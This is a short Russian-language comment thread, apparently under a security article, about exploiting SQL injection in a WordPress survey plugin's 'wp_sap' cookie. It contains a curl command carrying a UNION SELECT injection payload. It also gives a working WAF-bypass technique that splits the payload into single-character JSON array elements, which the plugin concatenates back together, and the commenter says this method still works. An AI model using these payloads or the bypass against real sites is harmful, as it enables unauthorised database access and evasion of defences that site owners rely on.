Comments 3
Но эксплуатация из данного сегмента сети была невозможна, как стало позже известно, потому что блокирует WAF

WAF можно было обходить, но спустя какое-то время обходы фиксили
curl -v --cookie "wp_sap=%5B%22242178939')) OR 1 IS NULL UNION((((SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(VERSION()),(11)))))#--%22%5D" http://site.test.lab | grep sss_params



Я эксплуатировал через WAF таким образом (сейчас тоже работает).
Если посмотреть код уязвимого плагина, то там кука, в которую производится инъекция, обрабатывается так:
...
$survey_viewed = json_decode( stripslashes( $_COOKIE[ 'wp_sap' ] ) );
...
$sv = implode( $survey_viewed );
...

И дальше в SQL запросе используется $sv. В оригинале там в куку записывается список из одной строки, но если ему дать список из нескольких строк — то он их склеит в одну. Поэтому вместо такой куки:
["242178939')) UNION SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"]

Можно давать такую, в которой сигнатуры уже остуствуют:
["242178939')) ","U","N","I","O","N"," ","S","E","L","E","C","T"," ","1",",","2",",","3",",","4",",","5",",","6",",","7",",","8",",","9",",","@","@","v","e","r","s","i","o","n",",","1","1#"]

Да, и кстати, «OR 1=2» там, естественно, лишний (привычка писать «OR 1=1»? :-D ).
Only those users with full accounts are able to leave comments. Log in, please.